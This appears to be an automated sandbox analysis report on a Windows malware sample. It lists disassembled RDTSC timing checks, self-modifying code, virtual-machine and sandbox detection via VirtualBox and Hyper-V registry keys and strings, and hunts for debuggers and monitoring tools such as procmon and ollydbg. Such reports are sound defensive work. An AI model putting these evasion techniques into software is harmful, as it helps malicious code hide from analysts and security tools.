Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010DBB second address: 7010E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 22C34DD1h 0x0000000e popad 0x0000000f lea eax, dword ptr [ebp-18h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FEEDCB2F2F9h 0x0000001b jmp 00007FEEDCB2F2EBh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FEEDCB2F2F8h 0x00000027 and ecx, 49EC99B8h 0x0000002d jmp 00007FEEDCB2F2EBh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E2F second address: 7010E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FEEDCB1F6E5h 0x0000000b sub cx, 0456h 0x00000010 jmp 00007FEEDCB1F6E1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E6B second address: 7010E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E6F second address: 7010E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E82 second address: 7010E97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEEDCB2F2EAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E97 second address: 7010EAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010EE2 second address: 7010F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c jmp 00007FEEDCB2F2F9h 0x00000011 pushad 0x00000012 mov dh, ch 0x00000014 push ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 popad 0x00000018 test edi, edi 0x0000001a jmp 00007FEEDCB2F2F5h 0x0000001f js 00007FEF4CCDDA70h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEEDCB2F2F8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F47 second address: 7010F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F4B second address: 7010F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F51 second address: 7010F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F62 second address: 7010F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F66 second address: 7010F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b pushad 0x0000000c mov cx, bx 0x0000000f popad 0x00000010 mov ecx, esi 0x00000012 pushad 0x00000013 mov ebx, 05D68130h 0x00000018 popad 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEEDCB1F6E2h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F96 second address: 7010FE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 772406ECh 0x0000000e jmp 00007FEEDCB2F2F6h 0x00000013 sub eax, eax 0x00000015 jmp 00007FEEDCB2F2F1h 0x0000001a lock cmpxchg dword ptr [edx], ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEEDCB2F2EDh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010FE6 second address: 7011028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEEDCB1F6E1h 0x00000013 or esi, 45FCF4D6h 0x00000019 jmp 00007FEEDCB1F6E1h 0x0000001e popfd 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 test eax, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011028 second address: 7011037 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011037 second address: 70110AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEF4CCCDD5Eh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FEEDCB1F6DCh 0x00000016 or ch, FFFFFF88h 0x00000019 jmp 00007FEEDCB1F6DBh 0x0000001e popfd 0x0000001f push eax 0x00000020 pushad 0x00000021 popad 0x00000022 pop ebx 0x00000023 popad 0x00000024 mov edx, dword ptr [ebp+08h] 0x00000027 jmp 00007FEEDCB1F6E0h 0x0000002c mov eax, dword ptr [esi] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FEEDCB1F6E7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70110AA second address: 70110BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ch, bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70110BD second address: 70110C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70110C1 second address: 70110D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70110D0 second address: 701115E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEEDCB1F6DCh 0x00000013 sbb ah, 00000008h 0x00000016 jmp 00007FEEDCB1F6DBh 0x0000001b popfd 0x0000001c movzx eax, dx 0x0000001f popad 0x00000020 mov dword ptr [edx+04h], eax 0x00000023 jmp 00007FEEDCB1F6DBh 0x00000028 mov eax, dword ptr [esi+08h] 0x0000002b jmp 00007FEEDCB1F6E6h 0x00000030 mov dword ptr [edx+08h], eax 0x00000033 pushad 0x00000034 push ecx 0x00000035 mov cx, dx 0x00000038 pop edi 0x00000039 popad 0x0000003a mov eax, dword ptr [esi+0Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FEEDCB1F6E7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701115E second address: 70111AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov cx, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+0Ch], eax 0x0000000f jmp 00007FEEDCB2F2EDh 0x00000014 mov eax, dword ptr [esi+10h] 0x00000017 jmp 00007FEEDCB2F2EEh 0x0000001c mov dword ptr [edx+10h], eax 0x0000001f jmp 00007FEEDCB2F2F0h 0x00000024 mov eax, dword ptr [esi+14h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FEEDCB2F2EAh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70111AF second address: 70111BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70111BE second address: 70111D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70111D6 second address: 70111DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70111DA second address: 701120D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FEEDCB2F2F8h 0x00000013 pop ecx 0x00000014 jmp 00007FEEDCB2F2EBh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701120D second address: 7011213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011213 second address: 701123B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEEDCB2F2F0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701123B second address: 7011241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011241 second address: 7011247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011247 second address: 701126E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+18h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701126E second address: 7011274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011274 second address: 701127A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701127A second address: 701128E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701128E second address: 7011324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007FEEDCB1F6DEh 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 jmp 00007FEEDCB1F6E0h 0x00000019 mov dword ptr [edx+20h], eax 0x0000001c jmp 00007FEEDCB1F6E0h 0x00000021 mov eax, dword ptr [esi+24h] 0x00000024 jmp 00007FEEDCB1F6E0h 0x00000029 mov dword ptr [edx+24h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FEEDCB1F6DDh 0x00000035 and cl, 00000056h 0x00000038 jmp 00007FEEDCB1F6E1h 0x0000003d popfd 0x0000003e call 00007FEEDCB1F6E0h 0x00000043 pop esi 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011324 second address: 7011367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FEEDCB2F2EDh 0x00000015 or ecx, 49462316h 0x0000001b jmp 00007FEEDCB2F2F1h 0x00000020 popfd 0x00000021 mov ch, 11h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011367 second address: 70113A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c jmp 00007FEEDCB1F6E0h 0x00000011 mov ecx, dword ptr [esi+2Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEEDCB1F6E7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70113A4 second address: 70113AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70113AA second address: 7011497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b jmp 00007FEEDCB1F6E7h 0x00000010 mov ax, word ptr [esi+30h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FEEDCB1F6E4h 0x0000001b or ecx, 61306E58h 0x00000021 jmp 00007FEEDCB1F6DBh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FEEDCB1F6E8h 0x0000002d or cl, FFFFFFB8h 0x00000030 jmp 00007FEEDCB1F6DBh 0x00000035 popfd 0x00000036 popad 0x00000037 mov word ptr [edx+30h], ax 0x0000003b jmp 00007FEEDCB1F6E6h 0x00000040 mov ax, word ptr [esi+32h] 0x00000044 jmp 00007FEEDCB1F6E0h 0x00000049 mov word ptr [edx+32h], ax 0x0000004d jmp 00007FEEDCB1F6E0h 0x00000052 mov eax, dword ptr [esi+34h] 0x00000055 jmp 00007FEEDCB1F6E0h 0x0000005a mov dword ptr [edx+34h], eax 0x0000005d pushad 0x0000005e mov esi, 7A1082FDh 0x00000063 mov eax, 6A6751F9h 0x00000068 popad 0x00000069 test ecx, 00000700h 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 mov bx, 7984h 0x00000076 mov di, A9F0h 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011497 second address: 70114BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEF4CCDD54Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70114BD second address: 70114C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70114C3 second address: 70114D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70114D2 second address: 7011555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FEEDCB1F6DCh 0x00000016 jmp 00007FEEDCB1F6E5h 0x0000001b popfd 0x0000001c movzx esi, di 0x0000001f popad 0x00000020 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000024 jmp 00007FEEDCB1F6E3h 0x00000029 or dword ptr [edx+40h], FFFFFFFFh 0x0000002d jmp 00007FEEDCB1F6E6h 0x00000032 pop esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011555 second address: 7011559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011559 second address: 701155D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701155D second address: 7011563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011563 second address: 7011572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011572 second address: 7011581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSpecial instruction interceptor: First address: 1561974 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSpecial instruction interceptor: First address: 155F0AA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSpecial instruction interceptor: First address: 172E77D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSpecial instruction interceptor: First address: 156189F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_01069980 rdtsc 3_2_01069980
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00E8255D
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,3_2_00E829FF
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00E8255D
Source: w6cYYyWXqJ.exe, w6cYYyWXqJ.exe, 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: w6cYYyWXqJ.exe, 00000003.00000003.1331595263.0000000000B51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: w6cYYyWXqJ.exeBinary or memory string: Hyper-V RAW
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: w6cYYyWXqJ.exe, 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: w6cYYyWXqJ.exe, 00000003.00000003.1452618989.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453175602.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1485095882.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453323720.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452487923.0000000000BA1000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452581919.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453357804.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile opened: NTICE
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile opened: SICE
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_01069980 rdtsc 3_2_01069980
Source: w6cYYyWXqJ.exe, w6cYYyWXqJ.exe, 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: FProgram Manager
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
